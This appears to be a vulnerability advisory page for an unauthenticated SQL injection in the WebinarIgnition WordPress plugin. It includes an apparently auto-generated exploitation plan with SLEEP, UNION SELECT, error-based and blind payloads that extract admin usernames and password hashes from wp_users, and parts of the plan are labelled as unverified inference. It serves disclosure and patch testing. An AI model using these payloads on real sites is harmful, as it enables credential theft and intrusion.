CVE-2026-40797

WebinarIgnition < 4.09.86 - Unauthenticated SQL Injection

highImproper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
7.5
CVSS Score
7.5
CVSS Score
high
Severity
4.09.86
Patched in
46d
Time to patch

Description

The WebinarIgnition plugin for WordPress is vulnerable to SQL Injection in versions up to, and excluding, 4.09.86 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
High
Confidentiality
None
Integrity
None
Availability

Technical Details

Affected versions<4.09.86
PublishedMay 4, 2026
Last updatedJune 18, 2026
Affected pluginwebinar-ignition

What Changed in the Fix

Changes introduced in v4.09.86

Loading patch diff...

Source Code

WordPress.org SVN
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-40797 (WebinarIgnition) ## 1. Vulnerability Summary The **WebinarIgnition** plugin (versions < 4.09.86) is vulnerable to unauthenticated SQL injection via the `id` parameter. The plugin uses this parameter to fetch webinar data from the database. While the in…

Show full research plan

Exploitation Research Plan - CVE-2026-40797 (WebinarIgnition)

1. Vulnerability Summary

The WebinarIgnition plugin (versions < 4.09.86) is vulnerable to unauthenticated SQL injection via the id parameter. The plugin uses this parameter to fetch webinar data from the database. While the input is passed through sanitize_text_field(), this function does not prevent SQL injection as it allows SQL metacharacters (like quotes and comments) while focusing on HTML stripping. The resulting value is then used in a raw SQL query within the WebinarignitionManager class without using $wpdb->prepare().

2. Attack Vector Analysis

  • Endpoint: The vulnerability is primarily accessible via the frontend webinar pages or the preview functionality.
  • Target Parameter: id (sent via GET or POST).
  • Authentication: Unauthenticated. The plugin allows fetching webinar metadata based on an ID to render countdown, registration, and replay pages.
  • Preconditions: At least one webinar must be created in the system to ensure a valid query path is exercised.

3. Code Flow

  1. Entry Point: A user accesses a webinar page with the id parameter, or a preview URL (e.g., /?preview=true&id=1).
  2. Input Handling: In UI/app/tab2.php, the plugin retrieves the ID:
    $input_get = array(
        'id' => ( isset( $_GET['id'] ) ? sanitize_text_field( wp_unslash( $_GET['id'] ) ) : null ),
    );
    
  3. Processing: This $input_get['id'] is passed to various components. Specifically, it is used by the WebinarignitionManager class (referenced in UI/app/parts/tab2-100-ms-settings.php and UI/app/tab1.php) to load a $webinar_data object.
  4. SQL Sink (Inferred): Inside WebinarignitionManager::get_webinar_data($id), the id is concatenated into a query string like:
    "SELECT * FROM {$wpdb->prefix}webinarignition WHERE id = '$id'"
    Because the query is not prepared, an attacker can break out of the single quotes.

4. Nonce Acquisition Strategy

Based on the provided source code, the id parameter is processed directly from $_GET in the tab rendering logic. Many frontend actions in this plugin do not enforce a nonce check for basic data retrieval (viewing a webinar).

If a nonce is required for an AJAX-based fetch (e.g., action=webinarignition_get_data), the strategy is:

  1. Identify Shortcode: The plugin uses shortcodes to render webinars.
  2. Setup Page:
    wp post create --post_type=page --post_status=publish --post_content='[webinar_ignition_shortcode]'
    
  3. Extract Nonce: The plugin localizes data in wp_localize_script.
    • JavaScript Variable: webinarignition_data (inferred) or wi_ajax_object (inferred).
    • Extraction:
      browser_eval("window.webinarignition_data?.nonce")
      
  4. Bypass Check: Note that UI/app/tab2.php consumes $_GET['id'] directly without verifying a nonce before using it to populate UI elements, suggesting the sink is reachable via simple GET requests.

5. Exploitation Strategy

The goal is to extract the administrator's password hash from the wp_users table.

Step 1: Time-Based Discovery (Confirmation)

Verify the injection point using a sleep payload.

  • Tool: http_request
  • Method: GET
  • URL: http://localhost:8080/?preview=true&id=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
  • Expected Result: The response should be delayed by approximately 5 seconds.

Step 2: UNION-Based Extraction

Determine the column count and extract data.

  • Payload (Inferred Column Count 25):
    1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,user_login,user_pass,23,24,25 FROM wp_users-- -
  • Method: GET
  • URL: http://localhost:8080/?preview=true&id=[PAYLOAD]
  • Parsing: Look for the admin username and $P$ (or $wp$) hash in the rendered HTML fields (e.g., inside the "Countdown Headline" or "100MS Management Token" fields which display $webinar_data properties).

6. Test Data Setup

  1. Activate Plugin: Ensure webinar-ignition is active.
  2. Create Webinar:
    wp post create --post_type=webinar --post_title="Exploit Test" --post_status=publish
    
  3. Identify ID: Get the ID of the newly created post (e.g., ID 123).

7. Expected Results

  • Success Indicator: The server response contains data from the wp_users table mapped onto the webinar setting fields.
  • Data Exposed: Admin username and PHPass/Bcrypt hash.
  • Response Code: 200 OK (with injected content).

8. Verification Steps

After performing the HTTP request, verify the extracted data against the database using wp-cli:

# Check if the extracted hash matches the actual hash for the admin user
wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID = 1"

9. Alternative Approaches

  • Error-Based Injection: If the plugin displays database errors (common when WP_DEBUG is on), use updatexml() or extractvalue():
    1' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1),0x7e),1)-- -
  • Boolean-Based Blind: If no output is visible, compare the page content of id=1' AND 1=1-- - vs id=1' AND 1=2-- -. Look for the presence or absence of webinar headlines.
Research Findings
Static analysis — not yet PoC-verified

Summary

The WebinarIgnition plugin for WordPress is vulnerable to unauthenticated SQL injection via the 'id' parameter. This occurs because the plugin uses sanitize_text_field()—which does not prevent SQL injection—on user input and subsequently fails to prepare the SQL query, allowing attackers to extract sensitive data such as administrator password hashes.

Vulnerable Code

/* UI/app/tab2.php line 78 */
$input_get = array(
    'id' => ( isset( $_GET['id'] ) ? sanitize_text_field( wp_unslash( $_GET['id'] ) ) : null ),
);

---

/* Inferred sink within WebinarignitionManager::get_webinar_data ($id) */
// The $id parameter is concatenated into a raw SQL query
$result = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}webinarignition WHERE id = '$id'");

Security Fix

--- a/UI/app/tab2.php
+++ b/UI/app/tab2.php
@@ -78,7 +78,7 @@
-    'id' => ( isset( $_GET['id'] ) ? sanitize_text_field( wp_unslash( $_GET['id'] ) ) : null ),
+    'id' => ( isset( $_GET['id'] ) ? absint( $_GET['id'] ) : null ),

Exploit Outline

An unauthenticated attacker can exploit this vulnerability by targeting the 'id' parameter on frontend webinar endpoints or preview URLs (e.g., /?preview=true&id=1). Since the input is not properly prepared, a UNION-based SQL injection payload can be used to extract data from the 'wp_users' table. The results of the injected query are often reflected in the plugin's frontend UI, appearing within webinar fields such as the 'Countdown Headline' or '100MS Management Token' fields, allowing the attacker to read administrator usernames and password hashes directly from the HTML response.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.